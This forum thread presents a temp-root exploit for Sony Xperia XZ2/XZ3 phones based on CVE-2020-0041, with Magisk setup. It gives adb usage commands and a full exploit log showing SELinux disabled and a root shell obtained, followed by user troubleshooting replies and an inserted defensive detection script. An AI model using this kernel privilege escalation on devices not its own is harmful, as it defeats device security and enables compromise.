
[XZ2/XZ2c/XZ2p/XZ3] temp root exploit via CVE-2020-0041 including magisk setup


cyrup

New member
Nov 12, 2021
2
0
Sony Xperia XZ2 Premium
Hi guys, has anyone tried using the XZ2 Premium dual firmware that is provided here on the single SIM?
I can't find a link for build 52.1.A.0.618 for single SIM. I want to temproot my XZ2 Premium.
 

difkey

New member
Nov 25, 2021
1
0
Hi, j4nn.
Already asked before - can you make an update for SO-05K (XZ2 Compact Docomo) support?
I understand that the exploit only works with an identical kernel image.
I understand that this exploit is for the tama platform.
I have the Xperia XZ2 Compact Japanese version SO-05K too.
I tried to test the exploit.
Naturally, after trying to execute the exploit, it became clear that it was not supported for this firmware.
I found downloadable Android 10 firmware - SO-05K_NTT DoCoMo JP_52.0.B.9.316-R11B
Can it be exploited?
Can you explain what changes need to be made in the exploit for it to work for the SO-05K_NTT DoCoMo firmware?
Kernel image is available on Google Drive: here
 

didine7607

Member
Apr 15, 2012
7
0
Hi everyone, I have an XZ3 dual SIM H9436, so I downloaded the fw posted here as it's recommended to use temproot; I just wanted to install Pixel Launcher so I can use the gestures feature... The installation of the fw went flawlessly, no problem at all, but when I temprooted and installed the folders of Pixel Launcher in the oem folder then rebooted, my phone freezes every time when Xperia is about to display; it restarts, then reboots when Xperia shows up, over and over. (FYI, in the past I unlocked my bootloader in the hope of rooting it and installing custom ROMs, but after I unlocked it, I wasn't able to root it because there's simply no way to do so with the XZ3.) So now I'm posting here hoping to find some help, please :(
 

mak6021

Senior Member
Nov 26, 2016
67
21
39
Polotsk
> Hi everyone, I have an XZ3 dual SIM H9436, so I downloaded the fw posted here as it's recommended to use temproot; I just wanted to install Pixel Launcher so I can use the gestures feature... The installation of the fw went flawlessly, no problem at all, but when I temprooted and installed the folders of Pixel Launcher in the oem folder then rebooted, my phone freezes every time when Xperia is about to display; it restarts, then reboots when Xperia shows up, over and over. (FYI, in the past I unlocked my bootloader in the hope of rooting it and installing custom ROMs, but after I unlocked it, I wasn't able to root it because there's simply no way to do so with the XZ3.) So now I'm posting here hoping to find some help, please :(
It's not something complicated to get Magisk root: just patch boot and boot via fastboot. If you want, I can give instructions, but I need your boot and vbmeta from the firmware.
 

didine7607

Member
Apr 15, 2012
7
0
> It's not something complicated to get Magisk root: just patch boot and boot via fastboot. If you want, I can give instructions, but I need your boot and vbmeta from the firmware.
Thank you, I just want the phone to boot after that and get access to gestures. Where can I find my boot and vbmeta of the firmware? Because I installed the one posted here, download link for H9436 dual SIM

Edit:
I'm not sure if these are the files you asked for; I found them in the main folder after extracting the 3 zips, and the boot from the boot zip
https://drive.google.com/file/d/1wlZrwxgiPoaWjlrNel0sQNXLpnJqUSl4/view?usp=sharing
https://drive.google.com/file/d/1npIAB9E4mTdGvL7uY3qv54R1FlF63AM6/view?usp=sharing
 

mak6021

Senior Member
Nov 26, 2016
67
21
39
Polotsk
sorry for double post :/
The second link is wrong!! Okay, if you have this version, follow the instructions below.
Connect the phone in fastboot mode (turn off the phone, hold down the volume "+" key and, without releasing it, connect the smartphone to the computer, wait for the blue LED to light up, then you can release the key). Open the files one by one (after opening and executing the command, they close themselves): 1vbmeta.cmd -> 2boot.cmd -> 3dtbo.cmd -> 4reboot.cmd ... Good luck
 

Attachments

  • 52.1.А.3.137.rar (26.7 MB)

didine7607

Member
Apr 15, 2012
7
0
> The second link is wrong!! Okay, if you have this version, follow the instructions below.
> Connect the phone in fastboot mode (turn off the phone, hold down the volume "+" key and, without releasing it, connect the smartphone to the computer, wait for the blue LED to light up, then you can release the key). Open the files one by one (after opening and executing the command, they close themselves): 1vbmeta.cmd -> 2boot.cmd -> 3dtbo.cmd -> 4reboot.cmd ... Good luck
Thank you very much 🙏. Will try it tomorrow, just one question: is this supposed to get rid of the bootloop? Or to root? And if it's the first answer, can I still boot and find the Pixel Launcher?
 

didine7607

Member
Apr 15, 2012
7
0
> Thank you very much 🙏. Will try it tomorrow, just one question: is this supposed to get rid of the bootloop? Or to root? And if it's the first answer, can I still boot and find the Pixel Launcher?
I'm trying to do exactly what you told me, but nothing happens when I click on each command; am I doing something wrong?
 

didine7607

Member
Apr 15, 2012
7
0
> I'm trying to do exactly what you told me, but nothing happens when I click on each command; am I doing something wrong?
nvm, it was a driver issue; I managed to install all 4 scripts, the phone rebooted, and this time it went a little bit further: at first it was restarting at "exper...", now I can see Xperia fully on screen for a couple of seconds, then bootloop... please help me fix it
 

goriath

Member
May 18, 2013
11
1
I hope to see a reply to my post since the topic seems to have become a minor trend and the author more likely has other things to do in life, BTW...

I have an Xperia XZ2 Compact (H8314), stock, unbranded, CustomIT region, with a Vodafone SIM card (I live in Italy) - latest Android 10 Sony ROM installed, 52.1.A.3.49

All I wanted (...for Xmas) was VoLTE, since my carrier provides the service, although the phone isn't listed in their "Very Important Phone" list (actually no Sony device is listed). It's vital for me to get VoLTE since my carrier has removed 3G and 2G coverage is getting worse - so no 4G in my case means no inbound/outbound calls at all...
If I don't manage to solve the problem, more likely I'm going to change the carrier rather than the phone, but that's not the point...

The question:
With the info in the OP, would it be possible (?) to:

- Downgrade to a target fw (since mine isn't supported)
- Temp root the phone
- Install a custom recovery (TWRP) w/o UBL
- Then upgrade to the major release again
- Mod the phone in order to support VoLTE (by editing build.prop, like I have heard...) ???

Or is there something I'm missing?

I spent the last 3 days seeking and reading for a strategy, but everything seems to be about unlocking the BL at some point and I don't want to (you know the reason... I read in this thread that even if you could temp root the phone to back up the locked/unlocked TA partitions, with DRM keys intact in order to restore them later, the phone is not going to accept the keys anymore...)

Many thanks
 

mirhl

Senior Member
Oct 15, 2012
3,089
1,159
Build.prop isn't gonna get you anywhere.
It's not a problem with your phone, but the carrier (which is certainly a joke when it can certify super cheap Alcatels and 6yo Lumias, but not Xperias).


To be sure, there's nothing you can't do if you unlock the bootloader (even though I don't really know how much work it could still entail). But there's some small chance you could still manage to pull it off with just temp root and QPST, maybe.
This isn't really the right thread, though.
 

Top Liked Posts

  • 31
    temp root exploit for Sony Xperia XZ2/XZ2c/XZ2p/XZ3 with Android 10 firmware
    including temporary Magisk setup from the exploit


    The exploit uses CVE-2020-0041; it was originally designed for the Pixel 3 running kernel 4.9.
    I have adapted the Pixel 3 specific exploit for the kernel 4.9 that is used with Sony TAMA platform phones running Android 10 with the February 2020 security patch level.

    SUPPORTED TARGETS
    This has been tested only with the Xperia XZ2 H8216-52.1.A.0.618 target, but support for other targets has been implemented based on analysis of each kernel image from the target firmware.
    Please note, it is unlikely that any other fw version than those listed above would work.
    The only (unlikely) case in which the exploit could work with a different fw version (or a different phone model) would be if it used a binary-identical kernel image in the firmware.

    USAGE HOWTO INCLUDING MAGISK SETUP
    • be sure to run a supported firmware version on your phone (you may need to downgrade, which involves a factory reset)
    • enable developer options and, in there, adb debugging (installing adb drivers if needed)
    • download the tama-mroot.zip with the exploit attached to this post
    • download Magisk-v20.4.zip from the Magisk releases page on GitHub here
    • use 'adb push tama-mroot.zip Magisk-v20.4.zip /data/local/tmp' to copy the zips to the phone
    • unzip and prepare the Magisk setup with the following commands in 'adb shell':
      Code:
      cd /data/local/tmp
      unzip tama-mroot.zip
      chmod 755 tama-mroot magisk-setup.sh magisk-start.sh
      ./magisk-setup.sh
    • get temp root and start Magisk with the following commands in 'adb shell':
      Code:
      cd /data/local/tmp
      ./tama-mroot
      ./magisk-start.sh -1
      ./magisk-start.sh -2
      ./magisk-start.sh -3

    If it worked, you should see something like this:

    Code:
    H8216:/ $ cd /data/local/tmp
    H8216:/data/local/tmp $ ./tama-mroot                                                                                                                                                                            
    [+] Detected H8216-52.1.A.0.618 target
    [+] Mapped 200000
    [+] selinux_enforcing before exploit: 1
    [+] pipe file: 0xffffffd07822fa00
    [+] file epitem at ffffffd102da6d00
    [+] Reallocating content of 'write8_inode' with controlled data...............[DONE]
    [+] Overwriting 0xffffffd07822fa20 with 0xffffffd102da6d50...[DONE]
    [+] Write done, should have arbitrary read now.
    [+] file operations: ffffff9dee01ebf8
    [+] kernel base: ffffff9dece80000
    [+] Reallocating content of 'write8_selinux' with controlled data..[DONE]
    [+] Overwriting 0xffffff9def290000 with 0x0...[DONE]
    [+] init_cred: ffffff9def02fcd0
    [+] memstart_addr: 0xfffffff040000000
    [+] First level entry: ae7f6003 -> next table at ffffffd06e7f6000
    [+] Second level entry: ae419003 -> next table at ffffffd06e419000
    [+] sysctl_table_root = ffffff9def05c710
    [+] Reallocating content of 'write8_sysctl' with controlled data.......[DONE]
    [+] Overwriting 0xffffffd1316fc268 with 0xffffffd0ba748000...[DONE]
    [+] Injected sysctl node!
    [+] Node write8_inode, pid 7109, kaddr ffffffd0c1193700
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Node write8_selinux, pid 6726, kaddr ffffffd08bfeb400
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Node write8_sysctl, pid 6772, kaddr ffffffd0afc0d000
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Cleaned up sendmsg threads
    [+] epitem.next = ffffffd07822fa20
    [+] epitem.prev = ffffffd07822fad8
    [+] Launching privileged shell
    root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -1                                                                                                                                                    
    + FRESH=false
    + '[' -1 '=' --fresh ']'
    + '[' ! -e /data/adb/magisk/busybox ']'
    + ./magiskpolicy --live --magisk 'allow dumpstate * * *'
    Load policy from: /sys/fs/selinux/policy
    root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -2                                                                                                                                                    
    + FRESH=false
    + '[' -2 '=' --fresh ']'
    + '[' ! -e /data/adb/magisk/busybox ']'
    + STAGE=2
    + '[' 2 '=' 2 ']'
    + mount -t tmpfs -o 'mode=755' none /sbin
    + chcon u:object_r:rootfs:s0 /sbin
    + chmod 755 /sbin
    + cp -a magisk/boot_patch.sh /sbin
    + cp -a magisk/magiskboot /sbin
    + cp -a magisk/magiskinit64 /sbin
    + cp -a magisk/busybox /sbin
    + cp -a magisk/util_functions.sh /sbin
    + cd /sbin
    + chmod 755 boot_patch.sh busybox magiskboot magiskinit64 util_functions.sh
    + mkdir r
    + mount -o bind / r
    + cp -a r/sbin/. /sbin
    + umount r
    + rmdir r
    + mv magiskinit64 magiskinit
    + ./magiskinit -x magisk magisk
    + ln -s /sbin/magiskinit /sbin/magiskpolicy
    + ln -s /sbin/magiskinit /sbin/supolicy
    + false
    + chcon -R u:object_r:magisk_file:s0 /data/adb/magisk
    + rm -f magiskboot util_functions.sh boot_patch.sh
    + ln -s /sbin/magisk /sbin/su
    + ln -s /sbin/magisk /sbin/resetprop
    + ln -s /sbin/magisk /sbin/magiskhide
    + mkdir /sbin/.magisk
    + chmod 755 /sbin/.magisk
    + >/sbin/.magisk/config
    + echo 'KEEPVERITY=true'
    + >>/sbin/.magisk/config
    + echo 'KEEPFORCEENCRYPT=true'
    + chmod 000 /sbin/.magisk/config
    + mkdir -p /sbin/.magisk/busybox
    + chmod 755 /sbin/.magisk/busybox
    + mv busybox /sbin/.magisk/busybox
    + mkdir -p /sbin/.magisk/mirror
    + chmod 000 /sbin/.magisk/mirror
    + mkdir -p /sbin/.magisk/block
    + chmod 000 /sbin/.magisk/block
    + mkdir -p /sbin/.magisk/modules
    + chmod 755 /sbin/.magisk/modules
    + mkdir -p /data/adb/modules
    + chmod 755 /data/adb/modules
    + mkdir -p /data/adb/post-fs-data.d
    + chmod 755 /data/adb/post-fs-data.d
    + mkdir -p /data/adb/service.d
    + chmod 755 /data/adb/service.d
    + chcon -R -h u:object_r:rootfs:s0 /sbin/.magisk
    + chcon u:object_r:magisk_file:s0 /sbin/.magisk/busybox/busybox
    + /sbin/magisk --daemon
    client: launching new main daemon process
    + pidof magiskd
    + MP=14148
    + '[' -z 14148 ']'
    + >/sbin/.magisk/escalate
    + echo 14148
    + '[' -e /sbin/.magisk/escalate ']'
    + sleep 1
    + '[' -e /sbin/.magisk/escalate ']'
    root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -3                                                                                                                                                    
    + FRESH=false
    + '[' -3 '=' --fresh ']'
    + '[' ! -e /data/adb/magisk/busybox ']'
    + STAGE=3
    + '[' 3 '=' 2 ']'
    + >/sbin/.magisk/magiskd
    + echo -e '#!/system/bin/sh\n/sbin/magisk --daemon'
    + chmod 755 /sbin/.magisk/magiskd
    + chcon u:object_r:dumpstate_exec:s0 /sbin/.magisk/magiskd
    + getprop init.svc.dumpstate
    + SVC=''
    + timeout=10
    + '[' 10 -gt 0 ']'
    + stop dumpstate
    + killall -9 magiskd
    + stop dumpstate
    + mount -o bind /sbin/.magisk/magiskd /system/bin/dumpstate
    + start dumpstate
    + timeout=10
    + '[' 10 -le 0 ']'
    + pidof magiskd
    + MP=14165
    + '[' -n 14165 ']'
    + break
    + stop dumpstate
    + sleep 1
    + umount /system/bin/dumpstate
    + rm -f /sbin/.magisk/magiskd
    + '[' '' '=' running ']'
    + rm -f /dev/.magisk_unblock
    + /sbin/magisk --post-fs-data
    + timeout=10
    + '[' -e /dev/.magisk_unblock -o 10 -le 0 ']'
    + sleep 1
    + timeout=9
    + '[' -e /dev/.magisk_unblock -o 9 -le 0 ']'
    + /sbin/magisk --service
    + sleep 1
    + /sbin/magisk --boot-complete
    + chmod 751 /sbin
    root_by_cve-2020-0041:/data/local/tmp # id                                                                                                                                                                      
    uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:magisk:s0
    root_by_cve-2020-0041:/data/local/tmp # uname -a
    Linux localhost 4.9.186-perf+ #1 SMP PREEMPT Fri Jan 17 01:22:05 2020 aarch64
    root_by_cve-2020-0041:/data/local/tmp # getenforce                                                                                                                                                              
    Permissive


    Now you can exit the temp root shell and use 'su' to get a root shell controlled by Magisk Manager, or allow other apps that need root, as asking for root permission now works.
    The Magisk setup from the exploit, including working permission asking, has been fully developed by me; it uses some novel techniques to overcome the limitations caused by Magisk being run from a temp root instead of being integrated in the boot process as a service.

    Please be careful what you use the temp root for.
    Changing something in partitions protected by dm-verity (or Android Verified Boot 2.0), for example /system, /vendor or the kernel boot image, can result in a phone that no longer boots.
    This is why it is called 'temp root': you get a root shell only temporarily, it is lost on reboot, and it does not allow making permanent changes in crucial partitions; you would need to unlock the bootloader for that.
    Some partitions might still be possible to modify; for example, in the case of Sony Xperia XZ1 phones it was possible to do a permanent debloat via changes in the /oem partition, and such a debloat would survive even a factory reset. Similarly, some modem configs have been present in /oem, allowing IMS to be set up for different operators/regions or other modem related stuff to be tuned.

    Please note, this exploit will get you a root shell on still-locked TAMA platform phones, which could allow backing up the TA partition in the still-locked state, with the DRM keys (the device key) still there. Backup of the TA partition now works with tama-mroot, avoiding the 'Required key not available' error you could experience with the previously released tama-root.
    There is currently no known method, though, to restore DRM functionality after bootloader unlock, even after restoring the TA partition from the locked-state backup.
    For details please check the 'exploiting xperia XZ2 - good and bad news' post and the following discussion there.

    SOURCES
    Exploit sources for all releases are available at my GitHub here.

    CREDITS
    Big thanks to Blue Frost Security for the excellent writeup and the exploit itself.

    DONATIONS
    If you like my work, you can donate using the Donate to Me button with several methods there.
    Thank you very much to all who donate.

    DOWNLOAD
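As an added example (not part of the original post or the tama-mroot project), a Python check a defender could run over captured 'adb shell' output: it flags kernel 4.9 devices whose security patch level predates the fix for CVE-2020-0041, and it looks for the artefacts the transcript above shows this temp-root setup leaving on a live device (tmpfs over /sbin, the bind mount over /system/bin/dumpstate, SELinux permissive, a running magiskd). The sample command outputs are constructed, and the 2020-03-01 fix threshold is an assumption taken from the bulletin that shipped the fix.

```python
import re
from datetime import date

# CVE-2020-0041 was fixed in the March 2020 Android security bulletin; the post
# above says the supported firmware carries the February 2020 patch level.
# Assumption: any patch level from 2020-03-01 onward includes the fix.
FIX_PATCH_LEVEL = date(2020, 3, 1)

# Constructed sample command output, modelled on the transcript in the post
# (not captured from a real device).
SAMPLE_PROPS = {"ro.product.model": "H8216",
                "ro.build.version.security_patch": "2020-02-01"}
SAMPLE_UNAME = ("Linux localhost 4.9.186-perf+ #1 SMP PREEMPT "
                "Fri Jan 17 01:22:05 2020 aarch64")
SAMPLE_MOUNT = ("/dev/block/dm-0 on / type ext4 (ro,seclabel,relatime)\n"
                "none on /sbin type tmpfs (rw,seclabel,relatime,mode=751)\n")
SAMPLE_PS = "USER PID PPID NAME\nroot 1 0 init\nroot 14165 1 magiskd\n"


def patch_level_exposed(props, uname):
    """True when the kernel is 4.9.x and the patch level predates the fix."""
    m = re.match(r"\S+\s+\S+\s+(\d+)\.(\d+)\.", uname)
    if not m or (int(m.group(1)), int(m.group(2))) != (4, 9):
        return False  # the adapted exploit targets kernel 4.9 only
    y, mo, d = (int(x) for x in props["ro.build.version.security_patch"].split("-"))
    return date(y, mo, d) < FIX_PATCH_LEVEL


def temproot_indicators(mount_out, getenforce_out, ps_out):
    """Artefacts magisk-start.sh leaves on a running device (gone after reboot)."""
    found = []
    for line in mount_out.splitlines():
        if re.match(r"\S+ on /sbin type tmpfs\b", line):
            found.append("tmpfs mounted over /sbin")        # stage 2: mount -t tmpfs
        if " on /system/bin/dumpstate " in line:
            found.append("bind mount over /system/bin/dumpstate")  # stage 3
    if getenforce_out.strip() == "Permissive":
        found.append("SELinux permissive")                 # 'getenforce' in transcript
    for line in ps_out.splitlines():
        if line.split()[-1:] == ["magiskd"]:
            found.append("magiskd process running")        # '/sbin/magisk --daemon'
    return found


if __name__ == "__main__":
    model = SAMPLE_PROPS["ro.product.model"]
    print(f"{model}: patch level exposed to CVE-2020-0041:",
          patch_level_exposed(SAMPLE_PROPS, SAMPLE_UNAME))
    for hit in temproot_indicators(SAMPLE_MOUNT, "Permissive\n", SAMPLE_PS):
        print("indicator:", hit)
```

On a real device the inputs come from 'getprop', 'uname -a', 'mount', 'getenforce' and 'ps -A'; the indicators only exist until the next reboot, which is exactly why a locked phone stays locked after this temp root.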
    7
    implemented magisk setup from temproot

    finally got Magisk from temp root working, including the permission asking feature - released as tama-mroot.zip - get it here
    5
    CHANGELOG
    • 2020-05-14 : released initial version of tama-root (no Magisk support, problem with 'Required key not available' returned from some commands)
    • 2020-05-22 : finally got Magisk from temp root working, including the permission asking feature - released as tama-mroot.zip
    5
    As it seems the .618 fw versions are going missing from XperiFirm, please let me know if you need some - I still have the following:
    H8116_Customized IBE_1313-3189_52.1.A.0.618_R3C
    H8166_Customized FR_1313-2540_52.1.A.0.618_R4C
    H8216_Customized UK_1313-4679_52.1.A.0.618_R5C
    H8266_Customized FR_1313-2481_52.1.A.0.618_R4C
    H8296_Customized TW_1313-6119_52.1.A.0.618_R4C
    H8314_Customized FR_1313-2468_52.1.A.0.618_R4C
    H8324_Customized FR_1313-2469_52.1.A.0.618_R2C
    H8416_Customized IBE_1316-6423_52.1.A.0.618_R5C
    H9436_Customized FR_1316-3076_52.1.A.0.618_R6C
    H9493_Customized HK_1316-2331_52.1.A.0.532_R2C
    so I may upload them on request.
    4
    So you did it again! You are insane mate!!
    Respect.